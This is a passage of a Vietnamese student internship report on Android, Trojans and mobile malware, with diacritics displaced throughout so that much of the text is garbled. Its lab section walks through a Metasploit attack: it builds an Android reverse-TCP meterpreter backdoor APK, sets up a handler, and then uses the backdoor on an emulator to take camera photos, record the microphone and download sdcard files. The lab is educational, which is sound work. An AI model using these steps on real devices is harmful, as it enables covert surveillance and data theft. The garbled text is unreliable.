Ngày càng nhi u suy đoán r ng Google sẽ tham gia th tr ng đi n tho i diề ằ ị ườ ệ ạ đ ng xu t hi n trong tháng 12 năm 2006. Tin t c c a BBC và Nh t báo ph Wallộ ấ ệ ứ ủ ậ ố chú thích r ng Google mu n đ a công ngh tìm ki m và các ng d ng c a h vàoằ ố ư ệ ế ứ ụ ủ ọ đi n tho i di đ ng và h đang n l c làm vi c đ th c hi n đi u này. Các ph ngệ ạ ộ ọ ỗ ự ệ ể ự ệ ề ươ ti n truy n thông truy n th ng l n online cũng vi t v tin đ n r ng Google đangệ ề ề ố ẫ ế ề ồ ằ phát tri n m t thi t b c m tay mang th ng hi u Google. M t vài t báo còn nóiể ộ ế ị ầ ươ ệ ộ ờ r ng trong khi Google v n đang th c hi n nh ng b n mô t kỹ thu t chi ti t, hằ ẫ ự ệ ữ ả ả ậ ế ọ đã trình di n s n ph m m u cho các nhà s n xu t đi n tho i di đ ng và nhàễ ả ẩ ẫ ả ấ ệ ạ ộ m ng. Tháng 9 năm 2007, InformationWeek đăng t i m t nghiên c u c aạ ả ộ ứ ủ Evalueserve cho bi t Google đã n p m t s đ n xin c p b ng sáng ch trong lĩnhế ộ ộ ố ơ ấ ằ ế v c đi n tho i di đ ng. ự ệ ạ ộ
Ngày 5/11/2007, Liên minh thi t b c m tay m (Open Handset Alliance),ế ị ầ ở m t hi p h i bao g m nhi u công ty trong đó có Texas Instruments,T p đoànộ ệ ộ ồ ề ậ Broadcom, Google, HTC, Intel, LG, T p đoàn MarvellTechnology, Motorola, Nvidia,ậ Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile đ c thành l p v iượ ậ ớ m c đích phát tri n các tiêu chu n m cho thi t b di đ ng. Cùng ngày, Androidụ ể ẩ ở ế ị ộ cũng đ c ra m t v i vai trò là s n ph m đ u tiên c a Liên minh, m t n n t ngượ ắ ớ ả ẩ ầ ủ ộ ề ả thi t b di đ ng đ c xây d ng trên nhân Linux phiên b n 2.6. Chi c đi n tho iế ị ộ ượ ự ả ế ệ ạ ch y Android đ u tiên đ c bán ra là HTC Dream, phát hành ngày 22 tháng 10ạ ầ ượ năm 2008. Bi u t ng c a h đi u hành Android m i là m t con rôb t màu xanhể ượ ủ ệ ề ớ ộ ố
SVTH: Lê Công H u 51101058ậ
Trang 30
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
lá cây do hãng thi t k Irina Blok t i California vẽ. ế ế ạ
T năm 2008, Android đã tr i qua nhi u l n c p nh t đ d n d n c i ti nừ ả ề ầ ậ ậ ể ầ ầ ả ế h đi u hành, b sung các tính năng m i và s a các l i trong nh ng l n phát hànhệ ề ổ ớ ử ỗ ữ ầ tr c. M i b n nâng c p đ c đ t tên l n l t theo th t b ng ch cái, theo tênướ ỗ ả ấ ượ ặ ầ ượ ứ ự ả ữ c a m t món ăn tráng mi ng; ví d nh phiên b n 1.5 Cupcake (bánh bông lanủ ộ ệ ụ ư ả nh có kem) ti p n i b ng phiên b n 1.6 Donut (bánh vòng). Phiên b n m i nh tỏ ế ố ằ ả ả ớ ấ (chính th c) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra m t lo tứ ắ ạ thi t b Nexus - m t dòng s n ph m bao g m đi n tho i thông minh và máy tínhế ị ộ ả ẩ ồ ệ ạ b ng ch y h đi u hành Android, do các đ i tác ph n c ng s n xu t. HTC đã h pả ạ ệ ề ố ầ ứ ả ấ ợ tác v i Google trong chi c đi n tho i thông minh Nexus đ u tiên, Nexus One. Kớ ế ệ ạ ầ ể t đó nhi u thi t b m i h n đã gia nh p vào dòng s n ph m này, nh đi n tho iừ ề ế ị ớ ơ ậ ả ẩ ư ệ ạ Nexus 4 và máy tính b ng Nexus 10, l n l t do LG và Samsung s n xu t. Googleả ầ ượ ả ấ xem đi n tho i và máy tính b ng Nexus là nh ng thi t b Android ch l c c aệ ạ ả ữ ế ị ủ ự ủ mình, v i nh ng tính năng ph n c ng và ph n m m m i nh t c a Android. ớ ữ ầ ứ ầ ề ớ ấ ủ
Đ c đi mặ ể
1. Tính m . Android đ c xây d ng t d i đi lên cho phép ng i phátở ượ ự ừ ướ ườ tri n t o các ng d ng di đ ng h p d n v i đ y đ các đi m m nh c aể ạ ứ ụ ộ ấ ẫ ớ ầ ủ ể ạ ủ các thi t b c m tay hi n có. Android hoàn toàn m , m t ng d ng có thế ị ầ ệ ở ộ ứ ụ ể g i t i b t k m t ch c năng lõi c a đi n tho i nh t o cu c g i, g i tinọ ớ ấ ể ộ ứ ủ ệ ạ ư ạ ộ ọ ử nh n hay s d ng máy nh, cho phép ng i phát tri n t o phong phúắ ử ụ ả ườ ể ạ h n, liên k t h n các tính năng cho ng i dùng. Android đ c xây d ngơ ế ơ ườ ượ ự trên nhân Linux m . Thêm n a, nó s d ng m t máy o mà đã đ c t iở ữ ử ụ ộ ả ượ ố
u hóa b nh và ph n c ng v i môi tr ng di đ ng. Android mà m tư ộ ớ ầ ứ ớ ườ ộ ộ mã ngu n m , nó có th đ c m r ng đ k t h p t do gi a các côngồ ở ể ượ ở ộ ể ế ợ ự ữ ngh n i tr i. N n t ng này sẽ ti p t c phát tri n b i c ng đ ng phátệ ổ ộ ề ả ế ụ ể ở ộ ồ tri n đ t o ra các ng d ng di đ ng hoàn h o. ể ể ạ ứ ụ ộ ả
2. Tính ngang b ng c a các ng d ng. V i Android, không có s khác nhauằ ủ ứ ụ ớ ự gi a các ng d ng đi n tho i c b n v i ng d ng c a bên th ba. Chúngữ ứ ụ ệ ạ ơ ả ớ ứ ụ ủ ứ đ c xây d ng đ truy c p nh nhau t i m t lo t các ng d ng và d chượ ự ể ậ ư ớ ộ ạ ứ ụ ị v c a đi n tho i. V i các thi t b đ c xây d ng trên n n t ng Android,ụ ủ ệ ạ ớ ế ị ượ ự ề ả ng i dùng có th đáp ng đ y đ các nhu c u mà h thích. Chúng ta cóườ ể ứ ầ ủ ầ ọ th đ i màn hình n n, ki u g i đi n tho i, hay b t k ng d ng nào.ể ổ ề ể ọ ệ ạ ấ ể ứ ụ Chúng ta th m chí có th h ng d n đi n tho i ch xem nh ng nh mìnhậ ể ướ ẫ ệ ạ ỉ ữ ả thích.
3. Phá v rào c n phát tri n ng d ng. Android phá v rào c n đ t o ngỡ ả ể ứ ụ ỡ ả ể ạ ứ d ng m i và c i ti n. M t ng i phát tri n có th k t h p thông tin tụ ớ ả ế ộ ườ ể ể ế ợ ừ trang web v i d li u trên đi n tho i cá nhân – ch ng h n nh danh b ,ớ ữ ệ ệ ạ ẳ ạ ư ạ l ch hay v trí trên b n đ – đ cung c p chính xác h n cho ng i khác.ị ị ả ồ ể ấ ơ ườ V i Android, ng i phát tri n có th xây d ng m t ng d ng mà choớ ườ ể ể ự ộ ứ ụ phép ng i dùng xem v trí c a nh ng ng i b n và thông báo khi hườ ị ủ ữ ườ ạ ọ đang v trí lân c n. T t c đ c l p trình d dàng thông qua s h trở ị ậ ấ ả ượ ậ ễ ự ỗ ợ c a MapView và d ch v đ nh v toàn c u GPS. ủ ị ụ ị ị ầ
4. Xây d ng ng d ng d dàng và nhanh chóng. Android cung c p b thự ứ ụ ễ ấ ộ ư
SVTH: Lê Công H u 51101058ậ
Trang 31
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
vi n giao di n l p trình ng d ng đ s và các công c đ vi t các ngệ ệ ậ ứ ụ ồ ộ ụ ể ế ứ d ng ph c t p. Ví d , Android có th cho phép ng i phát tri n bi tụ ứ ạ ụ ể ườ ể ế đ c v trí c a thi t b và cho phép các thi t b giao ti p v i nhau đ cóượ ị ủ ế ị ế ị ế ớ ể th t o nên m ng xã h i chia s ngang hàng r ng kh p. Thêm n a,ể ạ ạ ộ ẻ ộ ắ ữ Android còn bao g m m t b công c đ y đ giúp cho vi c phát tri n trồ ộ ộ ụ ầ ủ ệ ể ở nên d dàng.ễ
2.1.4 Gi i thi u v Trojan:ớ ệ ề
Trojan - m t ch ng trình d ng virus, m t k làm n i gián trong máyộ ươ ạ ộ ẻ ộ tính c a b n đã giúp cho hacker đi u khi n máy tính c a b n, Trojan giúpủ ạ ề ể ủ ạ hacker l y nh ng thông tin quý báu c a b n, th m chí h n có th xóa ho cấ ữ ủ ạ ậ ắ ể ặ đ nh d ng l i c c ng c a b n n a. Trojan có th nhi m vào máy c a b nị ạ ạ ả ổ ứ ủ ạ ữ ể ễ ủ ạ qua t p tin g n kèm th đi n t mà b n đã vô tình t i v và ch y th , ho c cóậ ắ ư ệ ử ạ ả ề ạ ử ặ l n trong nh ng ch ng trình trò ch i, nh ng ch ng trình mà b n không rõẫ ữ ươ ơ ư ươ ạ ngu n g c...ồ ố Ð "moi ru t" đ c m t kh u c a các ch thuê bao, hacker n iể ộ ượ ậ ẩ ủ ủ ộ th ng s d ng virus có h Trojan g i đ n các thuê bao c n t n công thôngườ ử ụ ọ ử ế ầ ấ qua th đi n t (e-mail) d i d ng d li u đính kèm (File Attachment). Chư ệ ử ướ ạ ữ ệ ỉ c n khi các ch thuê bao vô tình m file này, l p t c Trojan đ c kích đ ng vàầ ủ ở ậ ứ ượ ộ t đ ng sao chép l i t t c các thông s v m t kh u c a ch thuê bao. Khôngự ộ ạ ấ ả ố ề ậ ẩ ủ ủ ch là m t kh u truy c p Intemet mà ngay c đ n m t kh u c a hòm th đi nỉ ậ ẩ ậ ả ế ậ ẩ ủ ư ệ t cũng d dàng b đánh c p. Ngay sau khi ch thuê bao k t n i Internet,ử ễ ị ắ ủ ế ố Trojan sẽ bí m t sinh ra m t e- mail và g i m t kh u đánh c p v cho "tinậ ộ ử ậ ẩ ắ ề t c". Và sau đó m i l n thay đ i m t kh u virus Trojan sẽ ti p t c l ng lẽặ ỗ ầ ổ ậ ẩ ế ụ ặ "tu n" c a ăn c p t i m t đ a ch mà hacker n i đã đ nh s n.ồ ủ ắ ớ ộ ị ỉ ộ ị ẵ
Ð đánh l a "n n nhân", "tin t c" luôn tìm cách giăng ra nh ng lo i b yể ừ ạ ặ ữ ạ ẫ h t s c tinh vi. Tinh vi đ n n i không ít ch thuê bao dù r t 'kỹ tính" nh ngế ứ ế ỗ ủ ấ ư
SVTH: Lê Công H u 51101058ậ
Trang 32
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
v n c "s p" b y nh th ng. Ph bi n nh t là hacker n i đ i l t nh ng tẫ ứ ậ ẫ ư ườ ổ ế ấ ộ ộ ố ữ ổ ch c hay công ty có uy tín đ đánh l a ch thuê bao b ng ch ng trình ph nứ ể ừ ủ ằ ươ ầ m m th ma Ghostmail. "tin t c" d dàng th o ra nh ng e-mail m o danh v iề ư ặ ễ ả ữ ạ ớ n i dung: "Hi n gi tình tr ng đánh c p m t kh u thuê bao đang r t phộ ệ ờ ạ ắ ậ ẩ ấ ổ bi n, nh m đ phòng tránh, chúng tôi xin đ c g i t i quý khách ch ngế ằ ể ượ ử ớ ươ trình ph n m m Tr-Protect (Vi rút Trojan sau khi đã đ i tên)". Có khi chúngầ ề ổ l i "đ i l t" chuyên gia l p trình ch ng trình di t virus s 1 Vi t Namạ ộ ố ậ ươ ệ ố ệ Nguy n T Qu ng: "Ð phòng ch ng virus Chernobyl 26- 4, chúng tôi hânễ ử ả ể ố h nh g i t i quý ngài ch ng trình BKAV 383. Mong quý v dùng th M i ýạ ở ớ ươ ị ử ọ ki n đóng góp xin g i v đ a ch sauế ử ề ị ỉ quangnt@it-hut.edu.vn". Khi nh n đ cậ ượ nh ng tin ki u nh v y, có không ít thuê bao d dàng "c n câu" và c "tữ ể ư ậ ễ ắ ứ ự nhiên" cho ch y ch ng trình vi rút Trojan mà không h nh n th c đ c r ngạ ươ ề ậ ứ ượ ằ h đang "t nguy n" hi n mình thành n n nhân c a b n "tin t c"ọ ự ệ ế ạ ủ ọ ặ .
Nh v y, khi Trojan đ c kích ho t trên máy c a b n và khi b n truy c pư ậ ượ ạ ủ ạ ạ ậ Internet thì Trojan có th l y m t kh u truy c p m ng, l y danh sách thể ấ ậ ẩ ậ ạ ấ ư đi n t và th m chí c c u hình máy tính c a b n đ g i cho m t đ a ch thệ ử ậ ả ấ ủ ạ ể ử ộ ị ỉ ư đi n t c a tên tin t c. Nh ng nguy hi m h n, Trojan còn g i c đ a ch m ngệ ử ủ ặ ư ể ơ ử ả ị ỉ ạ IP, là đ a ch mà nhà cung c p d ch v m ng (ISP) gán cho b n lúc truy c p;ị ỉ ấ ị ụ ạ ạ ậ tên tin t c sẽ s d ng đ a ch IP c a b n đ thi t l p k t n i t máy tính c aặ ử ụ ị ỉ ủ ạ ể ế ậ ế ố ừ ủ h n t i máy tính c a b n qua m ng Internet. Trojan sẽ l y thông tin, xóaắ ớ ủ ạ ạ ấ thông tin...
Các th đo n c a Hackerủ ạ ủ
1. Gi danh nhà cung c p d ch v : Hacker l y danh nghĩa nhà cung c pả ấ ị ụ ấ ấ d ch v Internet (ISP) g i đi n tho i ho c g i e-mail yêu c u b n cung c pị ụ ọ ệ ạ ặ ở ầ ạ ấ password ho c đ i password theo h g i ý. Hacker mail cho b n m t Attachedặ ổ ọ ợ ạ ộ File (t p tin .exe) cho bi t là file h tr s d ng Internet nh ng th c ch t đâyậ ế ỗ ợ ử ụ ư ự ấ là file ăn c p password.ắ
2. L i d ng s tin t ng khi m n ho c s a ch a máy tính c a b n h sẽợ ụ ự ưở ượ ặ ử ữ ủ ạ ọ d dàng l y m t kh u vì đa s ng i s d ng đ u th ng xuyên Saveễ ấ ậ ẩ ố ườ ử ụ ề ườ Password vào máy.
3. Cài "gián đi p" vào máy tính c a b n: Ðây là ph ng th c c đi nệ ủ ạ ươ ứ ổ ể nh ng l i là cách ăn c p password thông d ng và hi u qu nh t mà không t nư ạ ắ ụ ệ ả ấ ố công s c, th ng là file Horse Trojan đ c g i qua e-mail v i nh ng l i m iứ ườ ượ ở ớ ữ ờ ờ chào h t s c h p d n, kích thích tò mò. N u b n m file này thì ngay l p t cế ứ ấ ẫ ế ạ ở ậ ứ máy b n đã b nhi m virus và t đó tr đi, password c a b n đ c th ngạ ị ễ ừ ở ủ ạ ượ ườ xuyên g i v cho Hacker ngay c khi b n thay password m i.ở ề ả ạ ớ
SVTH: Lê Công H u 51101058ậ
Trang 33
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
SVTH: Lê Công H u 51101058ậ
Trang 34
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ð phòng, tìm và di t Trojan?ề ệ
Ð đ phòng b nhi m Trojan và các lo i virus, b n c n th n tr ng khi ể ề ị ễ ạ ạ ầ ậ ọt i các t p tin trên m ng.ả ậ ạ
Ð tìm và di t Trojan, b n c n ti n hành theo các b c sau:ể ệ ạ ầ ế ướ
1. Không nên t i và ch y th nh ng t p tin g n kèm th đi n t g i choả ạ ử ữ ậ ắ ư ệ ử ử b n t nh ng đ a ch th đi n t mà b n không rõ. Cũng vì lý do nàyạ ừ ữ ị ỉ ư ệ ử ạ mà tác gi c a ch ng trình di t vi rút thông d ng BKAV đã c nh báoả ủ ươ ệ ụ ả có nhi u k m o danh g i cho b n ch ng trình di t virus mà th cề ẻ ạ ử ạ ươ ệ ự ch t là Trojan.ấ
2. S d ng ch ng trình phát hi n và di t Trojan, b n có th tìm ki mử ụ ươ ệ ệ ạ ể ế trên m ng Internet v i t khóa "Detect and destroy Trojan"ạ ớ ừ .
3. N u b n không có s n trong tay nh ng ch ng trình phát hi n và di tế ạ ẵ ữ ươ ệ ệ Trojan thì b n có th ki m tra Registry c a Window: HKEY – LOCAL –ạ ể ể ủ MACHINE \ Software \ Microsoft \ Windows \ Current Version \ Run. N u th y có đ ng d n t i m t ch ng trình mà b n bi t là khôngế ấ ườ ẫ ớ ộ ươ ạ ế ph i c a Window ho c c a các ch ng trình ti n ích, b n hãy thoátả ủ ặ ủ ươ ệ ạ Window v ch đ DOS và xóa t p tin theo đ ng d n c a Registry,ề ế ộ ậ ườ ẫ ủ vào l i Window và xóa dòng đã ghi trong Registry. B n cũng có thạ ạ ể ki m tra c t p tin Win.ini, System.ini trong th m c C:\Windows sauể ả ậ ư ụ m c Run ho c Load.ụ ặ
2.1.5 Gi i thi u v Malware:ớ ệ ề
SVTH: Lê Công H u 51101058ậ
Trang 35
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Malware (ph n m m ác tính) vi t t t c a c m t Malicious Sofware, làầ ề ế ắ ủ ụ ừ m t ph n m m máy tính đ c thi t k v i m c đích thâm nh p ho c gâyộ ầ ề ượ ế ế ớ ụ ậ ặ h ng hóc máy tính mà ng i s d ng không h hay bi t. ỏ ườ ử ụ ề ế
Theo th ng kê c a các hãng b o m t trên th gi i thì hi n các Malwareố ủ ả ậ ế ớ ệ hi n nay m i ch d ng l i m c đ xâm nh p và ăn c p thông tin c a ng iệ ớ ỉ ừ ạ ở ứ ộ ậ ắ ủ ườ dùng và nó ch a có c ch lây lan. Theo các k t qu trên thì Malware trênư ơ ế ế ả Smartphone hi n nay v cách th c ho t đ ng gi ng nh m t ph n m m giánệ ề ứ ạ ộ ố ư ộ ầ ề đi p (Trojan) h n là m t virus phá h y. ệ ơ ộ ủ
C ch ho t đ ng c a Malwareơ ế ạ ộ ủ
Malware này ho t đ ng qua hai giai đo n: ạ ộ ạ
- Giai đo n đ u: Malware đ c nhúng vào trong m t ng d ng và sẽạ ầ ượ ộ ứ ụ chi m đ c quy n root vào thi t b c a b n ngay sau khi b n ch y ng d ngế ượ ề ế ị ủ ạ ạ ạ ứ ụ đó trong l n s d ng đ u tiên. ầ ử ụ ầ
- Giai đo n 2: Malware t đ ng cài đ t m t ng d ng th 2 v i m tạ ự ộ ặ ộ ứ ụ ứ ớ ộ permission đ c bi t cho phép quy n uninstall. M t khi các ng d ng th 2ặ ệ ề ộ ứ ụ ứ đ c cài đ t, nó có th g i các thông tin nh y c m t i m t máy ch t xa vàượ ặ ể ử ạ ả ớ ộ ủ ừ âm th m t i thêm các ng d ng khác. Vi c cài đ t ng d ng h th ng nàyầ ả ứ ụ ệ ặ ứ ụ ệ ố nh m ngăn ng a ng i dùng xem ho c g b cài đ t các ng d ng mà khôngằ ừ ườ ặ ỡ ỏ ặ ứ ụ đ c phép. ượ
Không gi ng nh giai đo n đ u, ng i dùng ph i kh i đ ng ng d ng đố ư ạ ầ ườ ả ở ộ ứ ụ ể b t đ u vi c lây nhi m. giai đo n th hai ng d ng t đ ng làm m t sắ ầ ệ ễ Ở ạ ứ ứ ụ ự ộ ộ ố vi c nh là confirm, check-in. M t đi u n a khi n cho b n không th bi tệ ư ộ ề ữ ế ạ ể ế chúng ho t đ ng lúc nào (h u h t vào kho ng th i gian t 11h đêm t i 8hạ ộ ầ ế ả ờ ừ ớ sáng ngày hôm sau). Đây là kho ng th i gian mà đi n tho i ít có kh năngả ờ ệ ạ ả đ c s d ng nh t. Đi u này làm cho ng i dùng khó khăn h n trong vi cượ ử ụ ấ ề ườ ơ ệ phát hi n m t hành vi b t th ng trên chi c smartphone c a mình. ệ ộ ấ ườ ế ủ
M c đích c a Malwareụ ủ
M c đích c a Malware m i ch d ng l i m c đ làm cho chi c đi nụ ủ ớ ỉ ừ ạ ở ứ ộ ế ệ tho i c a ng i dùng t đ ng cài đ t nh ng ng d ng ch a mã đ c khác. Tuyạ ủ ườ ự ộ ặ ữ ứ ụ ứ ộ nhiên các bi n th v sau đã k p th i bi n đ i đ gây ra các m i nguy h i l nế ể ề ị ờ ế ổ ể ố ạ ớ h n r t nhi u. Ví d nh Hippo SMS đ c tìm th y m i đây có kh năng tơ ấ ề ụ ư ượ ấ ớ ả ự g i tin nh n mà không c n s cho phép c a ng i dùng, vi c này sẽ khi nử ắ ầ ự ủ ườ ệ ế ti n c c phí c a ng i dùng tăng lên m t cách chóng m t mà ng i dùngề ướ ủ ườ ộ ặ ườ không bi t rõ lí do t i sao. Ho c m t Malware khác là Zitmo, Malware này đ aế ạ ặ ộ ư
SVTH: Lê Công H u 51101058ậ
Trang 36
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
ra các ng d ng kích ho t m i hành đ ng liên quan đ n d ch v ngân hàng,ứ ụ ạ ọ ộ ế ị ụ ti p nh n SMS g i đ n và chuy n t i máy ch . Các đo n code dùng 1 l n màế ậ ử ế ể ớ ủ ạ ầ các ngân hàng th ng g i t i khách hàng thông qua tin nh n SMS đ ch ngườ ử ớ ắ ể ứ th c sẽ b thu th p b i các malware này. ự ị ậ ở
Hi n nay còn có m t s Malware còn có kh năng nghe lén t t c cácệ ộ ố ả ấ ả cu c đi n tho i. V n đ này th c s nguy hi m khi t t c các v n đ riêng tộ ệ ạ ấ ề ự ự ể ấ ả ấ ề ư c a chúng ta đang b m t theo dõi, vì v y nh ng m i nguy hi m t mã đ củ ị ộ ậ ữ ố ể ừ ộ trên Android đang th c s đe d a đ n an s an toàn c a ng i dùng h đi uự ự ọ ế ự ủ ườ ệ ề hành này.
2.1.6 Sinh mã đ c trên Kali Linux:ộ
Ta s d ng Metasploit framework trên Kali Linux đ t o m tử ụ ể ạ ộ payload, khi máy android t i v và m payload lên thì sẽ b xâm nh p vàả ề ở ị ậ đi u khi n. N u s d ng máy o Kali Linux b ng VMware, ta nên thi tề ể ế ử ụ ả ằ ế l p ph n Network nh sau:ậ ầ ư
B m vào ấ VM -> Settings... thanh l a ch n c a VMwareở ự ọ ủ
Hình 2.1.24 Setting network VMware (Step 1)
SVTH: Lê Công H u 51101058ậ
Trang 37
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
B m vào ấ Network Adapter và ch n ọ Bridged: connection directly to the physical network
Hình 2.1.25 Setting network VMware (Step 2)
B m vào ấ Edit -> Virtual Network Editor...
Hình 2.1.26 Setting network VMware (Step 3)
SVTH: Lê Công H u 51101058ậ
Trang 38
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Trên ph n ầ Bridge (connect VMs directly to the external network) ch n adapter c a máy th tọ ủ ậ
Hình 2.1.27 Setting network VMware (Step 4)
Sau đây ta vào ph n chính t o backdoor và xâm nh p đi u khi n androidầ ạ ậ ề ể
Đ u tiên m terminal và gõ dòng l nhầ ở ệ
msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk
SVTH: Lê Công H u 51101058ậ
Trang 39
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
192.168.0.104 là đ a ch IP c a máy Kali, ta có th s d ng l nh ị ỉ ủ ể ử ụ ệ ifconfig đ xem IP c a máy Kaliể ủ
8080 là s port, có th ch n port khác, không nên ch n các port th ngố ể ọ ọ ườ s d ng ử ụ
L nh trên sẽ t o ra 1 file ệ ạ files.apk trên desktop c a Kali, đây chính là m tủ ộ Metasploit reverse tcp backdoor.
SVTH: Lê Công H u 51101058ậ
Trang 40
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ti p theo, gõ l nh ế ệ msfconsole
Sau khi msfconsile load xong, ta t o m t handler đ x líạ ộ ể ử d li u truy nữ ệ ề về b ng cách gõ l nh sau:ằ ệ
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
SVTH: Lê Công H u 51101058ậ
Trang 41
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
set lhost 192.168.0.104 – [nh p đ a ch IP gi ng v i khi t o payload ậ ị ỉ ố ớ ạ ở trên].
set lport 8080 – [nh p port gi ng v i port khi t o payload trênậ ố ớ ạ ở ].
Exploit
Màn hình sẽ nh sau, lúc này ta đang ch m t máy android m backdoor.ư ờ ộ ở
2.1.7 Đ a mã đ c vào thi t b Android:ư ộ ế ị
Vì không có máy Android th t nên mình test ậ th v i m t máy Galaxyử ớ ộ Nexus gi l pả ậ b ng ph n m m GennyMotion (đăng ký m t tài kho n vàằ ầ ề ộ ả donwload t i ạ https://cloud.genymotion.com/page/launchpad/download/), t i v ả ề files.apk, cài đ t và m lên đ c giao di n nh d i, nh p vào nútặ ở ượ ệ ư ướ ấ “ReverseTCP”:
SVTH: Lê Công H u 51101058ậ
Trang 42
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
V y là ta đã k t n i thành công t i máy Android này, ậ ế ố ớ ở msfconsole sẽ nh sau:ư
SVTH: Lê Công H u 51101058ậ
Trang 43
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
S d ng camera:ử ụ
Đ xem danh sách camera, nh p ể ậ webcam_list
Đ ch p hình b ng camera, nh p webcam_snap x v i x là id c a camera ể ụ ằ ậ ớ ủxem danh sách camera ph n tr c. Ví d nh sau:ở ở ầ ướ ụ ư
SVTH: Lê Công H u 51101058ậ
Trang 44
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
File hình đã ch p t camera c a máy android là ụ ừ ủ FrumITki.jpeg đ c l uượ ư ở /root c a máy.ủ
Ghi âm
Đ th c hi n ghi âm, nh p l nh ể ự ệ ậ ệ record_mic và file ghi âm sẽ đ c l u vượ ư ề máy
SVTH: Lê Công H u 51101058ậ
Trang 45
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
2.1.8 Xâm nh p SD card c a thi t b Android t Kali Linux:ậ ủ ế ị ừ
Đ vào sdcard, nh p l nh: ể ậ ệ cd /sdcard và l nh ệ ls đ xem danh sách file, ểth m cư ụ
Ví d đây, ta t i file ụ ở ả App.apk trong th m c download c a sdcardư ụ ủ
SVTH: Lê Công H u 51101058ậ
Trang 46
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Dùng l nh ệ cd /sdcard/Download đ vào th m cể ư ụ
SVTH: Lê Công H u 51101058ậ
Trang 47
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Nh trên hình, ta th y 1 file là App.apk, đ t i v máy, ta nh p l như ấ ể ả ề ậ ệ
Download App.apk
Và file này sẽ đ c t i v th m c ượ ả ề ư ụ /root c a máy Kaliủ
2.1.9 K t lu n:ế ậ
Nh v y, ta đã tìm hi u v Kali Linux, cách s d ng Metasploit c a Kaliư ậ ể ề ử ụ ủ Linux đ xâm nh p và đi u khi n, truy n d li u t máy android v máy.ể ậ ề ể ề ữ ệ ừ ề
Sau khi th nghi m cách t n công này, ta rút ra k t lu n: không nên t iử ệ ấ ế ậ ả v và ch y file l trên máy android đ b o đ m không cài nh m backdoorề ạ ạ ể ả ả ầ nh đã th y trên, ch c n máy b nhi m backdoor là ta đã có th xem nh cóư ấ ở ỉ ầ ị ễ ể ư toàn quy n ki m soát máy android đó.ề ể
2.2 Làm trên VPS
2.2.1 Gi i thi u v VPS:ớ ệ ề
Đ nh nghĩaị
Máy ch o (Virtual Private Server -VPS) là ph ng pháp phân chia m tủ ả ươ ộ máy ch v t lý thành nhi u máy ch o. Trong khi trên m t server ch y m tủ ậ ề ủ ả ộ ạ ộ
SVTH: Lê Công H u 51101058ậ
Trang 48
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Share Host thì có th có hàng trăm tài kho n ch y cùng lúc, nh ng trên serverể ả ạ ư ch y VPS thì con s này ch b ng 1/10. Do v y, VPS có hi u năng cao h nạ ố ỉ ằ ậ ệ ơ Share Host r t nhi u.ấ ề
M i máy ch là m t h th ng hoàn toàn riêng bi t, có h đi u hành riêng,ỗ ủ ộ ệ ố ệ ệ ề có toàn quy n qu n lý root và có th restart l i h th ng b t c lúc nào. Doề ả ể ạ ệ ố ấ ứ v y, VPS h n ch 100% kh năng b hack local.ậ ạ ế ả ị
Trên 1 server ch y Share Host có nhi u Website ch y chung v i nhau,ạ ề ạ ớ chung tài nguyên server, n u 1 Website b t n công Ddos, botnet quá m nh sẽế ị ấ ạ làm nh h ng đ n các Website khác cùng server, riêng server VPS, m t tàiả ưở ế ộ kho n trên VPS b t n công thì m i tài kho n khác trên VPS đ u ho t đ ngả ị ấ ọ ả ề ạ ộ bình th ng.ườ
VPS dành cho các doanh nghi p v a và nh ng trang Web l n ho c mãệ ừ ữ ớ ặ ngu n n ng, n u ch y trên Share Host sẽ không đáp ng đ yêu c u.Tuyồ ặ ế ạ ứ ủ ầ nhiên, VPS đòi h i ng i s d ng ph i có thêm m t s ki n th c v b o m t,ỏ ườ ử ụ ả ộ ố ế ứ ề ả ậ c u hình server,….ấ
Đ c đi m v thông s VPSặ ể ề ố
Ho t đ ng hoàn toàn nh m t server riêng nên s h u m t ph n CPUạ ộ ư ộ ở ữ ộ ầ riêng, dung l ng RAM riêng, dung l ng HDD riêng, đ a ch IP riêng và hượ ượ ổ ị ỉ ệ đi u hành riêng.ề
Ti t ki m đ c nhi u chi phí so v i vi c thuê m t server riêng.ế ệ ượ ề ớ ệ ộ
Ngoài vi c dùng VPS đ thi t l p Web Server, Mail Server cũng nh cácệ ể ế ậ ư ng d ng khác thì có th cài đ t đ th c hi n nh ng yêu c u riêng nh truyứ ụ ể ặ ể ự ệ ữ ầ ư
c p Web b ng trình duy t Web trên VPS, dowload/upload bittorrent v i t cậ ằ ệ ớ ố đ cao…ộ
Trong tr ng h p VPS b thi u tài nguyên thì có th d dàng nâng c p tàiườ ợ ị ế ể ễ ấ nguyên mà không c n ph i kh i đ ng l i h th ng.ầ ả ở ộ ạ ệ ố
Có th cài l i h đi u hành v i th i gian t 5-10 phút.ể ạ ệ ề ớ ờ ừ
Giá tr khi s d ng VPSị ử ụ
Server m nh v i nhi u c u hình cho phép khách hàng d dàng l a ch nạ ớ ề ấ ễ ự ọ gói VPS phù h p.ợ
Mi n phí chi phí cài đ t ban đ u cũng nh c u hình ho t đ ng cho khácễ ặ ầ ư ấ ạ ộ hàng.
SVTH: Lê Công H u 51101058ậ
Trang 49
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
H tr khác hàng cài đ t mi n phí thêm các ph n m m riêng.ỗ ợ ặ ễ ầ ề
